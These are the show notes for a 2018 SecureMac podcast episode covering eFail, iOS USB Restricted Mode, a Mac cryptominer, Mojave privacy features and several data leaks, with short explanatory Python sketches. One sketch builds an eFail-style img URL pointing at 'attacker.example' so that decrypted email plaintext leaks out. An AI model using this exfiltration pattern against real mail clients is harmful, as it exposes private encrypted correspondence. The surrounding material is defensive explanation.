SecureMac, Inc.

The Checklist Podcast

SecureMac presents The Checklist. Each week, Nicholas Raba, Nicholas Ptacek, and Ken Ray hit security topics for your Mac and iOS devices. From getting an old iPhone, iPad, iPod, Mac, and other Apple gear ready to sell to the first steps to take to secure new hardware, each show contains a set of easy to follow steps meant to keep you safe from identity thieves, hackers, malware, and other digital downfalls. Check in each Thursday for a new Checklist!

Checklist 95: Summer Security News

Posted on June 28, 2018

It seems like it was just yesterday that we were kicking off the new year and wondering what the months ahead would have in store for us. As we head into the first sweltering days of summer, it’s safe to say that the first half of the year has been jam-packed with bigger and more far-reaching stories than even we could have anticipated. With so much going on, it can be tough to keep up with all the headlines coming your way. Luckily, we have your back — we’ve got the details on five of the stories you should know about right here in this week’s discussion. Let’s not waste any more time and jump right into this week’s topics.

On our list today:

  • A follow-up on eFail and Apple Mail
  • Apple changes the game for iOS forensics
  • More Mac cryptomining malware appears
  • MacOS Mojave brings major improvements to security & privacy
  • Another month, another leak — or two, or three…

Let’s start things off by revisiting the topic of encrypted email.

A follow-up on eFail and Apple Mail

Just a few weeks ago, back in Episode 93 of The Checklist, we discussed a newly discovered flaw in PGP, the encryption protocol most commonly used to send email privately and securely. You can read up on the full details of the flaw and the attack methods, dubbed eFail, in that episode’s show notes. As a quick refresher: the attack exploits the way email clients load HTML content that pulls resources from a remote web server, or the way other external media is embedded into an email. Through this exploit, an attacker can ultimately obtain a plaintext version of the encrypted email they want to intercept.
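To make the mechanics concrete, here is a minimal sketch of eFail’s “direct exfiltration” idea. This is a deliberate simplification (the real attack wraps the encrypted MIME part between attacker-supplied HTML parts, and `attacker.example` is a placeholder domain): after the victim’s client decrypts the message, the plaintext lands inside an image URL, so loading remote content sends it straight to the attacker.

```python
# Simplified model of eFail-style direct exfiltration (illustrative only;
# the real attack abuses multipart MIME structure in a crafted email).
decrypted_secret = "meet at noon"  # what the victim's mail client decrypts

# Attacker-controlled HTML fragments placed around the encrypted part:
html_prefix = '<img src="http://attacker.example/steal?d='  # opens the URL
html_suffix = '">'                                          # closes the tag

# After decryption, the client concatenates everything into one HTML
# document, so the plaintext becomes part of the image URL:
rendered = html_prefix + decrypted_secret + html_suffix

# If remote content loading is on, fetching this "image" hands the
# plaintext to the attacker's web server in the request URL.
assert "steal?d=meet at noon" in rendered
```

This is also why “disable remote content loading” was the original mitigation: if the client never fetches the image, the booby-trapped URL is never requested.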

When we recorded that episode, the best advice available to mitigate the risk was to disable the setting in your mail client that allows it to load remote content. Then, we suggested, it was time to sit and wait: we’d need to hear from the PGP developers themselves as they worked to identify a solution. Well, as it turns out, that advice worked in some ways — but not if you were using a particular PGP plugin with the Apple Mail client built into macOS.

Called GPGTools, this plugin lets you send encrypted email quickly and easily from within Apple Mail without the need to muck with a huge number of settings or to use special procedures for every message. While the GPGTools developers said remote loading was the key to exploiting eFail in their plugin, that seems to have been a little short-sighted. After programmers and others spread the word that remote content loading was better off disabled and would render the attack ineffective, a security researcher by the name of Micah Lee discovered that wasn’t always true.

With some effort, he was able to develop a “proof of concept” exploit that allowed eFail to work in Apple Mail even with remote content loading turned off entirely. Though he did not release specific details on the attack because there was no patch yet, he quickly sent his results to GPGTools to alert them of the danger. Unfortunately, this news was not as widely reported as the initial eFail announcement. Many users continue to believe that they’re completely safe again with remote content loading turned off, but this is not strictly true. Though the recommendations given out were the best possible with the information available at the time, circumstances quickly changed — as they often do in the security world.

There is good news at the end of this story, though. As of June 4th, GPGTools has issued a patch to fix the eFail exploit rather than simply using a mitigation strategy. If you use GPGTools to encrypt your email in Apple Mail, it’s time to update! Look for Suite 2018.2 and upgrade as soon as possible if you haven’t done so yet. Otherwise, you run the risk of remaining vulnerable to hackers with prying eyes.

Apple changes the game for iOS forensics

Here’s another important update to a story we covered recently. This time, we’re talking about something we mentioned back in Episode 88 of The Checklist, when Apple had made a strange and interesting modification to iOS in the name of security. If your iOS device went a full seven days without being unlocked via Touch ID, Face ID, or your passcode, access to the phone’s data through the Lightning port would be disabled. The only way to restore that access would be for a legitimate, authorized user to authenticate themselves.

At the time, it was clear that this was related to the “unlocker” devices being sold to law enforcement and other customers by companies such as GrayShift and Cellebrite. GrayShift’s GrayKey has especially concerned Apple, because it appears to attack the iOS bootloader, bypassing system security to run a brute-force attack that recovers the user’s passcode. By disabling the Lightning port after seven days, the reasoning went, law enforcement would have only a limited window in which to get at your device.

However, we also thought at the time that seven days was far too long a period to employ in a real-world situation. After all, if law enforcement got their hands on your device and they already had a GrayKey installed at the police department, it wouldn’t take seven days for them to go and plug it in to get at your data. The good news: it looks like the original week-long window was just a proof of concept Apple was using to test the waters. Either that or it was a move designed to deflect attention from their other efforts to solve the problems posed by these unlocker devices.

Now, in both the iOS 12 and iOS 11.4.1 betas, that period has been shortened considerably — Apple is taking the fight against these hardware exploits seriously. The data connection over the Lightning port will now be disabled just one hour after the last authenticated unlock of the device. Users should see no real impact from this change, as iOS already asks for your passcode when you plug a device into a computer (unless, of course, you’ve already trusted that machine). It means that while Apple may not be able to fix the underlying flaw the GrayShift devices exploit, they can slam the door shut in another way.
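The policy itself is simple enough to sketch. The code below is purely illustrative (it is not Apple’s implementation, and the constant reflects the one-hour window reported for the betas): the data connection is only allowed within a fixed window after the last successful authentication.

```python
from datetime import datetime, timedelta

# One-hour window reported for the iOS betas (assumption: exact behavior
# may differ in shipping releases).
USB_WINDOW = timedelta(hours=1)

def data_port_enabled(last_unlock: datetime, now: datetime) -> bool:
    """Sketch of the USB Restricted Mode policy: the Lightning data
    connection works only within USB_WINDOW of the last authenticated
    unlock; after that, the port charges but transfers no data."""
    return now - last_unlock <= USB_WINDOW

unlocked = datetime(2018, 6, 28, 9, 0)

# Within the hour, a trusted computer can still talk to the device:
assert data_port_enabled(unlocked, datetime(2018, 6, 28, 9, 30))

# An unlocker plugged in later finds the data connection dead:
assert not data_port_enabled(unlocked, datetime(2018, 6, 28, 10, 30))
```

The practical effect: a seized phone would have to reach a GrayKey within an hour of its owner last unlocking it, rather than within a week.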

We’ll keep an eye on this story as it develops. It will be interesting to see how Cellebrite and GrayShift respond to this change — if they can at all. If they’re unable to find a new way to get past this barrier in iOS, they’re going to have a lot of unhappy law enforcement customers. They’ll also have a tough time attracting any new business! Concerned users should be able to rest easier knowing that unauthorized access to their phone is now harder to obtain than ever.

More Mac cryptomining malware appears

Cryptominers? On your Mac? It could happen — at least, that’s increasingly what we’ve been seeing occur over these past few months. In Episode 82 of The Checklist, we discussed how a calendar app with a built-in cryptocurrency miner had managed to squeak past Apple’s review procedures. The app offered some extra features in exchange for giving over your CPU cycles to mine cryptocoins for the app developers. How it made it past Apple in the first place isn’t quite clear, but once the news broke, there was a serious backlash against the developers — and of course, negative PR for the App Store, too. Apple quickly revoked the app’s permissions and required the developers to remove the offending features.

While that’s a good example of a strong public outcry at work, malware authors don’t care how much you complain. They aren’t facing mobs of angry App Store customers, and generally, no one even knows who they are. So, what’s it to them if your computer runs slow if it means they can accumulate digital wealth on the down-low? That’s the case with a new type of malware recently discovered running on a Mac and using tons of the machine’s resources to mine cryptocurrency.

Discovered in late May, it had flown under the radar for an unknown amount of time. It only came to light because a user posted on the official Apple forums asking for help diagnosing performance problems with his computer: a process he identified, called “mshelper,” was using up so much of his CPU that he could not get much else done. After an investigation by security researchers, it turned out that mshelper is a package designed to hide a miner generating the cryptocurrency known as Monero.
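A miner like this stands out for exactly the reason the user noticed it: it pegs the CPU. As a rough diagnostic sketch (not the researchers’ actual tooling — just the standard `ps` listing, filtered in Python), this is how a process like “mshelper” would surface:

```python
import subprocess

def high_cpu_processes(threshold=50.0):
    """List (pid, %cpu, command) for processes above a CPU threshold,
    using the standard `ps` utility available on macOS and Linux."""
    out = subprocess.run(
        ["ps", "-Ao", "pid,pcpu,comm"],
        capture_output=True, text=True, check=True,
    ).stdout
    hits = []
    for line in out.splitlines()[1:]:      # skip the "PID %CPU COMMAND" header
        parts = line.split(None, 2)
        if len(parts) == 3:
            pid, pcpu, comm = parts
            if float(pcpu) >= threshold:
                hits.append((int(pid), float(pcpu), comm))
    return hits

# A cryptominer typically runs near 100% CPU, so a high threshold
# filters out normal activity and leaves only likely suspects:
suspects = high_cpu_processes(threshold=90.0)
```

On the affected machine, a listing like this would have shown “mshelper” sitting at the top, long before any antivirus signature existed for it.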

There was nothing particularly special or sneaky about this malware, though — it wasn’t even very well designed. Rather than running custom code, hiding its operations, or varying the intensity of its mining to avoid detection, it was just a basic “dropper.” Once it infected a machine, the dropper installed XMRig, a legitimate, official piece of software for mining Monero. Normally, users install XMRig voluntarily; in this case, the malware authors used it to steal CPU resources and mine coins for themselves.

Where did the user pick up this piece of malware? That is something we don’t yet know. Infections don’t appear to be widespread, however, as few other users have reported encountering mshelper. Nonetheless, this shows not only that random malware infections are on the rise on Macs, but that cryptominers in particular are a growing problem for Mac users. As with every other security threat, it’s important to wake up to the fact that it’s here on our Macs right now!

MacOS Mojave brings major improvements to security & privacy

That’s enough doom and gloom for right now — what about some good news for a change? Apple’s got some of that in the pipeline for macOS users, and we’re excited about the upcoming changes. Each June, Apple hosts its world-famous gathering known as the Worldwide Developers Conference. WWDC is an opportunity for Apple to bring Mac-focused developers together in one place to show off its latest hardware and software innovations. These developers typically spend the months following WWDC working hard to bring their apps up to speed for compatibility with the new flagship versions of macOS and iOS that launch in the fall of the same year.

This year, Apple’s WWDC included some awesome news about improvements the company has made to security and privacy in upcoming releases. The biggest of these changes will come in the newest version of macOS, called Mojave. macOS Mojave will replace High Sierra and bring with it some much-needed additions.

For example, Mojave will now explicitly ask for your permission before any app can be allowed to access locations on your machine that could include sensitive personal data. Such locations include Contacts, Photos, Calendars, Location data, Reminders, message histories, Mail databases, Safari-linked data, iTunes device backups, Time Machine backups, and system cookies.

That’s a lot of data — and these new permission requests are a great way to ensure that no app is ever rooting around in your personal files without your knowledge. However, these protections aren’t limited only to data. The new security will also ask for your permission before an app can access your camera or microphone, tipping you off to anything that might try to record you surreptitiously.

FaceTime is getting a face-lift and will now support up to 32 different devices in the same conversation. While that opens possibilities for huge video conference calls, it also comes with a much-needed security boost: end-to-end encryption. This level of encryption is already standard for voice calls and one-on-one FaceTime calls; the change extends that protection to everyone involved in a group chat.

Mojave will also include new improvements to iCloud Keychain. Remember how often we talk about not reusing the same password for different accounts? Keychain will now warn you if you try to reuse a password that you’ve used for another account. Now is also a good time to invest in a password manager and remove the need to remember complicated, unique passwords altogether. It’s easier and safer!

What about web browsing? Recent versions of macOS brought us improvements in Safari’s privacy by placing a limit on how much time a third-party tracking cookie will work before the system quarantines it altogether. Mojave is ramping up protections for Safari, and we can only say “Good!”

Fingerprinting, a method online advertisers use to identify users based on the device and browser they’re using to surf the web, is just as concerning these days as tracking cookies. Even if you’re blocking cookies, fingerprinting still works by asking your browser to return information such as your screen resolution, OS version, installed extensions, and more. All of this can add up to a unique identifier for your device. Now, Safari will refuse to transmit this information to advertisers. More than that, Safari will present a homogenized view: every Mac should look the same when a business tries to fingerprint your browser. Apple is also taking aim at Facebook’s tracking through “Like” and “Share” buttons, limiting their ability to track Safari users.
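Why does homogenizing the reported values defeat fingerprinting? A fingerprint is essentially a hash over everything the browser reveals about itself. This toy model (the attribute names and values are made up for illustration; real fingerprints use dozens of signals) shows both sides: distinct setups produce distinct identifiers, while identical generic answers collapse everyone into one indistinguishable crowd.

```python
import hashlib

def fingerprint(attrs: dict) -> str:
    """Reduce browser-reported attributes to a short identifier by
    hashing them in a canonical (sorted) order. Illustrative only."""
    canonical = "|".join(f"{k}={attrs[k]}" for k in sorted(attrs))
    return hashlib.sha256(canonical.encode()).hexdigest()[:16]

# Two users with slightly different setups get distinct fingerprints,
# so a tracker can tell them apart without any cookies:
alice = fingerprint({"resolution": "2560x1600", "os": "10.13.6",
                     "extensions": "1Password,uBlock"})
bob = fingerprint({"resolution": "1440x900", "os": "10.13.4",
                   "extensions": "Grammarly"})
assert alice != bob

# Mojave's approach: every Mac reports the same generic values, so the
# hash is identical for everyone and identifies no one in particular:
generic = {"resolution": "generic", "os": "generic", "extensions": "none"}
assert fingerprint(generic) == fingerprint(dict(generic))
```

The tracker still gets an answer — it’s just the same answer for every Safari user, which makes it worthless for telling people apart.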

Now, these features aren’t available to the public just yet. Apple still needs time to finish refining and implementing them. However, macOS Mojave (v. 10.14) is scheduled for release late this fall. Keep an eye out for it, and be ready to upgrade when it finally hits!

Another month, another leak — or two, or three…

In another recent episode, we spent some time talking about how your data isn’t always compromised by a malicious hack against those who hold our info. Sometimes their own mistakes leak the data onto the open Internet, or leave it in a place where a malicious party could find it. Well, the plumber we called still hasn’t shown up — we have three more big leak stories to cover this week, too.

The first leak we must talk about today comes from MyHeritage, a DNA testing service that also hosts genealogy tools. In the latter department, MyHeritage allows users to “explore the lives” of their ancestors and to “discover their family’s history.” Their DNA service has the tagline: “Uncover your ethnic origins and find new relatives with our simple DNA test.” We’ve discussed some of the strange and creepy ramifications of these services on The Checklist before, but that’s not exactly what we’re focusing on here today.

Obviously, though, both aspects of this business model require users to hand over a large amount of personal information if they want to be able to find long-lost relatives. With such a large amount of sensitive data in play, one would assume that they would also take precautions to protect all that information from unwanted intruders. Right?

Well, apparently not. According to a recent blog post on the MyHeritage site, the company received a notification from a security researcher on June 4th: he had found an archive file named “MyHeritage” on a private server outside the company’s control. Inside this archive were the email addresses and hashed passwords of nearly 100 million MyHeritage users — every single user who had signed up for the service up to the day the breach apparently took place, in October of 2017.

The fact that the passwords were hashed is good news; MyHeritage appears to use a strong hashing algorithm, so it will not be easy or feasible for the bad guys to crack the passwords. However, by the time MyHeritage made their post, it was still unknown how the hackers had compromised their servers. If you’ve used this site or their service, change your password — and change your passwords everywhere else you may have reused the same one, too. While not a major disaster, it’s troubling that a site holding so much sensitive info failed to detect such a major breach for so long.
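It’s worth seeing why hashing matters here. We don’t know MyHeritage’s exact algorithm, so this sketch uses PBKDF2 as a stand-in for a “strong” salted, deliberately slow hash: the site stores only a salt and digest, which is enough to verify logins but forces an attacker holding the leak to grind through the slow derivation for every guess against every account.

```python
import hashlib
import os

def hash_password(password: str, salt: bytes = None):
    """Store a password as (salt, digest) using a salted, slow hash.
    PBKDF2-SHA256 is illustrative; MyHeritage's actual scheme is unknown."""
    salt = salt or os.urandom(16)           # unique random salt per user
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return salt, digest

def verify(password: str, salt: bytes, stored: bytes) -> bool:
    """Re-derive the digest from a candidate password and compare."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000) == stored

# What a breached database row would contain -- no plaintext anywhere:
salt, stored = hash_password("correct horse battery staple")

assert verify("correct horse battery staple", salt, stored)  # right password
assert not verify("password123", salt, stored)               # wrong guess
```

The per-user salt is the other half of the defense: even two users with the same password get different digests, so precomputed “rainbow table” lookups don’t work.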

Next up: a company called TicketFly. Like TicketMaster but far smaller, TicketFly sells admission to shows that take place in smaller, independent venues. They, too, recently had some run-ins with computer security problems. On May 31st, the company had to take down their entire website after a hacker broke in and defaced the site. The digital graffiti left behind by the hacker: “Your security down, I’m not sorry. Next time I will publish database.”

According to the hacker, they had notified TicketFly time and time again of the flaw they used to break into the site, only to be ignored. After making no headway, they took a more aggressive, “black hat” route to solving the problem. TicketFly’s site went down for nearly a full week, and by the time the company had something new to say, it wasn’t anything good. They confirmed users’ worst fears: the hacker had compromised nearly 27 million user accounts on the site, including information such as names, addresses, emails, and phone numbers.

The hacker even went so far as to post some of that data publicly on the TicketFly website before its removal from the Internet. While the company says that no credit card information was accessed or stolen, this brazen attack both highlights the need for paying attention to security warnings and for stronger protections in the first place.

Finally: Facebook. Is it any surprise that we’re talking about them again? Today’s story is a bit different, though, from the two data leaks we’ve just covered. Instead of a hacker making off with personal info, this one involves users posting the information themselves.

Consider the way Facebook normally works: a user writes a post and chooses an “audience” for it on the site. You could post something publicly for anyone in the world to see, but most of the time, people set their audience to “friends only” — or even to “only me” if they want to keep the post to themselves. That’s the way it’s supposed to work, but recently the system broke down. A bug on Facebook’s servers meant that when users thought they were posting to their friends-only audience, the posts were being blasted out to the entire world as public posts.

The bug was live for ten days in May, and Facebook says it believes about 14 million users were affected in total. Users may not have known that they were posting publicly, especially because once the audience setting changes, it stays that way until you change it back. Facebook says it has started notifying affected users, telling them to review the audience set on their recent posts. Considering how seriously some people take these settings, this is a big bug, and it’s hard to believe it was live for so long — but at least, Facebook says, it’s now fixed.
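The “sticky” audience default is what made this bug so damaging, and it’s easy to model. This is not Facebook’s code — just an illustrative sketch of the behavior described above: whatever audience was last applied becomes the default for every subsequent post until it is explicitly changed back.

```python
class Composer:
    """Toy model of a post composer with a sticky audience setting."""

    def __init__(self, default="friends"):
        self.audience = default

    def post(self, text, audience=None):
        # If an audience is supplied, it persists as the new default --
        # which is exactly why a server-side flip to "public" kept
        # affecting later posts until users noticed and changed it back.
        if audience is not None:
            self.audience = audience
        return (text, self.audience)

c = Composer()
assert c.post("hello") == ("hello", "friends")   # expected default

c.post("oops", audience="public")                # the bug flips the setting...
assert c.post("vacation pics")[1] == "public"    # ...and it silently persists
```

That persistence is why Facebook’s notification asks you to review the audience on your *recent posts*, not just the single post where the flip happened.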

While we can’t expect data leaks ever to stop entirely, we can hope that the more these stories make the news, the more big companies will see the value in taking stronger precautions and being more proactive about safeguarding user information. Most likely, though, we’ll have plenty more to discuss in these areas over the coming months.

With that, we can conclude our look at the state of security news for the start of the summer. From data leaks to a trip to the Mojave, a lot is going on — but it doesn’t have to be tough to stay on top of things. We’ll keep bringing you the latest updates all summer, and all year, long.

Join our mailing list for the latest security news and deals